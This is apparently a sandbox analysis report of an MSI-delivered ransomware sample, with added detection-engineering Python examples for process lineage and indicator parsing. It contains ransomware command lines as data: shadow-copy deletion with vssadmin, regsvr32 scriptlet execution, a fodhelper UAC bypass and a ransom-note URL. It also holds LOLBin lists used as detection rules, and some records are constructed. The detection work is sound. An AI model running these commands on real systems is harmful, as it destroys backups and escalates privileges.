        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5100 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3708 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings)
          - Drops file in Program Files directory
          C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff61cad5460,0x7ff61cad5470,0x7ff61cad5480)
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8)
          - Suspicious behavior: EnumeratesProcesses
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3600 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1284 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:8)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3216 /prefetch:8)
C:\Windows\system32\vssvc.exe  (cmdline: C:\Windows\system32\vssvc.exe)
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\CompPkgSrv.exe  (cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding)
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc)
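Analyst note (added example, not part of the sandbox output): read together with the SetThreadContext and WriteProcessMemory signatures, the tree above gives the whole execution chain. msiexec.exe (PID 4936, the /V service instance) hands the package to MsiExec.exe (PID 928, the custom-action host), which sets the thread context of three already-running, Microsoft-signed session processes (sihost.exe 2648, svchost.exe 2716, taskhostw.exe 2792). Each of those then spawns regsvr32.exe with the first scriptlet (oz4xz8wjjjd3) and cmd /c "start fodhelper.exe"; the auto-elevated fodhelper.exe child runs the second scriptlet (kfx5819s5b), which runs vssadmin Delete Shadows /all /quiet, twice per injected host, matching the six vssadmin.exe PIDs in the signatures. MsiExec.exe itself only opens Edge on the ransom-note URL. The Python below rebuilds that lineage from process-creation and injection records and raises the three findings a detection engineer would key on: an injection target that goes on to create children, an auto-elevated UAC binary with any child at all, and a shadow-copy deletion with a script or COM host in its ancestry. The records are constructed from the report's process list and signatures; the PIDs the page does not show (cmd.exe, fodhelper.exe and the second regsvr32.exe in the chain) are assumed, long command lines are shortened, and the rule names and binary lists are the example's own.

```python
from collections import defaultdict

# Constructed process-creation records: (pid, ppid, image, command line).
# PIDs 4936, 928, 2648, 748, 956, 1344 and 5876 are taken from the report;
# cmd.exe, fodhelper.exe and the second regsvr32.exe in the chain have no PID
# on the page, so 6001-6003 are assumed.  Long command lines are shortened.
PROCESSES = [
    (4936, 0,    "msiexec.exe",   r"C:\Windows\system32\msiexec.exe /V"),
    (928,  4936, "MsiExec.exe",   r"C:\Windows\System32\MsiExec.exe -Embedding D5407ADCBB0E3C6AB912816C76408940"),
    (2648, 0,    "sihost.exe",    "sihost.exe"),
    (748,  2648, "regsvr32.exe",  "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3"),
    (6001, 2648, "cmd.exe",       'cmd /c "start fodhelper.exe"'),
    (6002, 6001, "fodhelper.exe", "fodhelper.exe"),
    (6003, 6002, "regsvr32.exe",  '"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b'),
    (5876, 6003, "vssadmin.exe",  r'"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet'),
    (956,  928,  "cmd.exe",       'cmd /c "start microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg"'),
    (1344, 956,  "msedge.exe",    "msedge.exe --single-argument microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg"),
]
# Constructed injection records (source pid, target pid) from the report's
# "Suspicious use of SetThreadContext" signature.
SET_THREAD_CONTEXT = [(928, 2648), (928, 2716), (928, 2792)]

# Auto-elevated binaries commonly abused for UAC bypass; none of them has a
# legitimate reason to spawn a child process.
AUTO_ELEVATED = {"fodhelper.exe", "computerdefaults.exe", "sdclt.exe", "eventvwr.exe"}
# Script/COM hosts that should never sit above a shadow-copy deletion.
LOLBIN_HOSTS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "fodhelper.exe"}


def build_tree(records):
    """Return ({pid: (ppid, image, cmdline)}, {ppid: [child pids]})."""
    procs = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in records}
    children = defaultdict(list)
    for pid, (ppid, _, _) in procs.items():
        children[ppid].append(pid)
    return procs, children


def ancestry(procs, pid):
    """Lower-cased image names from PID up to the root, PID first."""
    chain = []
    while pid in procs:
        ppid, image, _ = procs[pid]
        chain.append(image.lower())
        pid = ppid
    return chain


def detect(records, injections):
    procs, children = build_tree(records)
    findings = []

    def image_of(pid):
        return procs[pid][1] if pid in procs else "?"

    def add(rule, pid, child=None, detail=""):
        findings.append({"rule": rule, "pid": pid, "image": image_of(pid),
                         "child_pid": child, "child_image": image_of(child) if child else None,
                         "detail": detail})

    # (a) A process whose thread context was rewritten by another process then
    #     creates children: the injected code, not the host, is doing the work.
    for src, dst in injections:
        for child in children.get(dst, []):
            add("injected-process-spawns-child", dst, child, f"thread context set by pid {src}")

    # (b) An auto-elevated UAC binary spawning anything at all.
    for pid, (_, image, _) in procs.items():
        if image.lower() in AUTO_ELEVATED:
            for child in children.get(pid, []):
                add("auto-elevated-binary-spawns-child", pid, child, procs[child][2])

    # (c) vssadmin deleting shadows with a script/COM host somewhere above it.
    for pid, (_, image, cmd) in procs.items():
        low = cmd.lower()
        if image.lower() == "vssadmin.exe" and "delete" in low and "shadows" in low:
            hosts = sorted(set(ancestry(procs, pid)[1:]) & LOLBIN_HOSTS)
            if hosts:
                add("shadow-copy-deletion-via-lolbin", pid, detail="ancestors: " + ", ".join(hosts))
    return findings


if __name__ == "__main__":
    for f in detect(PROCESSES, SET_THREAD_CONTEXT):
        line = f"{f['rule']}: pid {f['pid']} {f['image']}"
        if f["child_pid"]:
            line += f" -> pid {f['child_pid']} {f['child_image']}"
        if f["detail"]:
            line += f"  ({f['detail']})"
        print(line)
```

Rule (a) is the one that survives renaming of the payload: sihost.exe, svchost.exe and taskhostw.exe normally create no children, so a SetThreadContext or WriteProcessMemory record against them followed by any process creation is a strong signal on its own, and it also explains why the "Modifies registry class" and "Interacts with shadow copies" signatures are attributed to those system processes rather than to the MSI.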
Network
Downloads
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
C:\Users\Public\oz4xz8wjjjd3
Filesize 4KB
MD5 74aa8efaba61b11cbb7a21a6f114daa1
SHA1 3b0b3a65e3c186229ce65fa7b51d95e56972a892
SHA256 19ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42
SHA512 d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b
-
C:\Windows\Installer\MSID5C3.tmp
Filesize 54KB
MD5 eadaaa6edab657ed52d0b76325494469
SHA1 0c3b0c61e91857f715e737276c7fcd066117095d
SHA256 ec0ac9068fa7c0e422f0f090efb31e335ef87439bb5034e98a6d9f1a6e292acb
SHA512 df8d3602f086b2a84b203f489a678f0e0c0ad2ae2114b24619e61d4c780969dc267719d9a29d4ba8ae15acdc32afeb7982437570b51e465a362ce6a53b4bd621
-
\??\pipe\LOCAL\crashpad_1344_IITJZNSHCXTOUKFD
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(These four digests are the well-known hashes of zero-length input: the Chromium crashpad crash-handler pipe was opened but nothing was captured from it, so this entry is not a usable file indicator.)
-
memory/320-165-0x0000000000000000-mapping.dmp
-
memory/376-149-0x0000000000000000-mapping.dmp
-
memory/612-162-0x0000000000000000-mapping.dmp
-
memory/748-136-0x0000000000000000-mapping.dmp
-
memory/928-131-0x0000000000000000-mapping.dmp
-
memory/928-143-0x00000259967E0000-0x00000259967EC000-memory.dmp
Filesize 48KB
-
memory/956-142-0x0000000000000000-mapping.dmp
-
memory/1048-148-0x0000000000000000-mapping.dmp
-
memory/1308-152-0x0000000000000000-mapping.dmp
-
memory/1344-145-0x0000000000000000-mapping.dmp
-
memory/1508-168-0x0000000000000000-mapping.dmp
-
memory/1508-178-0x0000000000000000-mapping.dmp
-
memory/1912-158-0x0000000000000000-mapping.dmp
-
memory/2224-130-0x0000000000000000-mapping.dmp
-
memory/2288-146-0x0000000000000000-mapping.dmp
-
memory/2648-144-0x000001F8A20A0000-0x000001F8A20A3000-memory.dmp
Filesize 12KB
-
memory/2712-176-0x0000000000000000-mapping.dmp
-
memory/2736-167-0x0000000000000000-mapping.dmp
-
memory/3108-154-0x0000000000000000-mapping.dmp
-
memory/3124-170-0x0000000000000000-mapping.dmp
-
memory/3132-172-0x0000000000000000-mapping.dmp
-
memory/3416-169-0x0000000000000000-mapping.dmp
-
memory/3660-164-0x0000000000000000-mapping.dmp
-
memory/3668-177-0x0000000000000000-mapping.dmp
-
memory/3704-200-0x0000000000000000-mapping.dmp
-
memory/3736-180-0x0000000000000000-mapping.dmp
-
memory/4164-156-0x0000000000000000-mapping.dmp
-
memory/4240-160-0x0000000000000000-mapping.dmp
-
memory/4340-198-0x0000000000000000-mapping.dmp
-
memory/4356-175-0x0000000000000000-mapping.dmp
-
memory/4376-196-0x0000000000000000-mapping.dmp
-
memory/4468-137-0x0000000000000000-mapping.dmp
-
memory/4484-171-0x0000000000000000-mapping.dmp
-
memory/4520-140-0x0000000000000000-mapping.dmp
-
memory/4680-163-0x0000000000000000-mapping.dmp
-
memory/4784-173-0x0000000000000000-mapping.dmp
-
memory/4828-166-0x0000000000000000-mapping.dmp
-
memory/5068-182-0x0000000000000000-mapping.dmp
-
memory/5264-202-0x0000000000000000-mapping.dmp
-
memory/5420-183-0x0000000000000000-mapping.dmp
-
memory/5428-184-0x0000000000000000-mapping.dmp
-
memory/5436-185-0x0000000000000000-mapping.dmp
-
memory/5560-186-0x0000000000000000-mapping.dmp
-
memory/5572-187-0x0000000000000000-mapping.dmp
-
memory/5608-188-0x0000000000000000-mapping.dmp
-
memory/5700-189-0x0000000000000000-mapping.dmp
-
memory/5712-190-0x0000000000000000-mapping.dmp
-
memory/5740-191-0x0000000000000000-mapping.dmp
-
memory/5836-192-0x0000000000000000-mapping.dmp
-
memory/5876-193-0x0000000000000000-mapping.dmp
-
memory/5912-194-0x0000000000000000-mapping.dmp
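The Downloads list above is what an analyst turns into indicators, and as extracted it has three problems: each dropped file is listed several times, the field labels are fused onto the values ("C:\...\kfx5819s5bFilesize", "MD55cf9..."), and one entry (the crashpad pipe) carries the digests of empty input. The parser below, an added example that is not part of the sandbox report, reads the list in exactly that fused form, merges repeats into one record with an occurrence count, validates digest lengths, flags empty-content hashes, and recovers PID and region length from the memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp names (the region length can then be checked against the listed Filesize). The sample input is a constructed subset of the entries on this page; the record layout and function names are this example's own, not the sandbox's API.

```python
# Added example (not part of the sandbox report): parse the flattened "Downloads"
# list into deduplicated, validated IoC records. Format assumptions, taken from the
# extracted text above: items are separated by a line holding only "-", the first
# line of an item is the path with the next field label fused onto it, and hash
# lines are written "LABELhexdigest" with no separator.
import re

HASH_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
HEX = set("0123456789abcdef")
# Digests of zero-length input: an entry carrying these has no captured content.
EMPTY_HASHES = {
    "md5": "d41d8cd98f00b204e9800998ecf8427e",
    "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
              "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
}
LABELS = ("Filesize", "MD5", "SHA1", "SHA256", "SHA512")
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)$")
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# memory/<pid>-<index>-0x<start>[-0x<end>]-(mapping|memory).dmp
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(mapping|memory)\.dmp$")


def split_hash_line(line):
    """'SHA15cb6...' -> ('sha1', '5cb6...'); the digest length settles SHA1 vs SHA256/SHA512."""
    for algo, n in HASH_LEN.items():
        tag = algo.upper()
        if line.startswith(tag):
            rest = line[len(tag):].lower()
            if len(rest) == n and set(rest) <= HEX:
                return algo, rest
    return None


def parse_size(text):
    m = SIZE_RE.match(text.strip())
    return int(float(m.group(1)) * UNITS[m.group(2)]) if m else None


def parse_item(lines):
    rec = {"path": lines[0], "kind": "file", "size_bytes": None, "hashes": {}}
    pending = None  # label fused onto the path line; its value is on the next line
    for label in LABELS:
        if lines[0].endswith(label):
            rec["path"], pending = lines[0][:-len(label)], label
            break
    for line in lines[1:]:
        if pending == "Filesize":
            rec["size_bytes"] = parse_size(line)
        elif pending:
            rec["hashes"][pending.lower()] = line.strip().lower()
        else:
            hit = split_hash_line(line)
            if hit:
                rec["hashes"][hit[0]] = hit[1]
        pending = None
    m = MEM_RE.match(rec["path"])
    if m:  # dumped memory region: recover PID and region length from the name
        rec["kind"], rec["pid"] = "memory", int(m.group(1))
        start, end = int(m.group(3), 16), m.group(4)
        rec["region_bytes"] = int(end, 16) - start if end else None
    rec["hashes_valid"] = all(len(v) == HASH_LEN[k] and set(v) <= HEX
                              for k, v in rec["hashes"].items())
    rec["empty_content"] = any(rec["hashes"].get(k) == v for k, v in EMPTY_HASHES.items())
    return rec


def collect_iocs(text):
    """Parse every item, merging verbatim repeats into one record with an occurrence count."""
    seen = {}
    for block in re.split(r"(?m)^-\s*$", text):
        lines = [l.strip() for l in block.splitlines() if l.strip()]
        if not lines:
            continue
        rec = parse_item(lines)
        key = (rec["path"], rec["hashes"].get("sha256"))
        if key in seen:
            seen[key]["occurrences"] += 1
        else:
            rec["occurrences"] = 1
            seen[key] = rec
    return list(seen.values())


# Constructed sample: a subset of the entries listed above, in the fused form in which
# they were extracted (one file repeated, the empty pipe entry, two memory dumps).
SAMPLE = r"""
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
\??\pipe\LOCAL\crashpad_1344_IITJZNSHCXTOUKFDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/320-165-0x0000000000000000-mapping.dmp
-
memory/928-143-0x00000259967E0000-0x00000259967EC000-memory.dmpFilesize
48KB
"""

if __name__ == "__main__":
    for r in collect_iocs(SAMPLE):
        flag = " EMPTY" if r["empty_content"] else ""
        print(f'{r["kind"]:6} x{r["occurrences"]} {r["path"]} {r["hashes"].get("sha256", "")}{flag}')
```

Records whose empty_content flag is set should be dropped before the hashes go into a blocklist; the memory records are useful mainly for picking which dump to open first (the 48KB region in PID 928 is the only sizeable one listed).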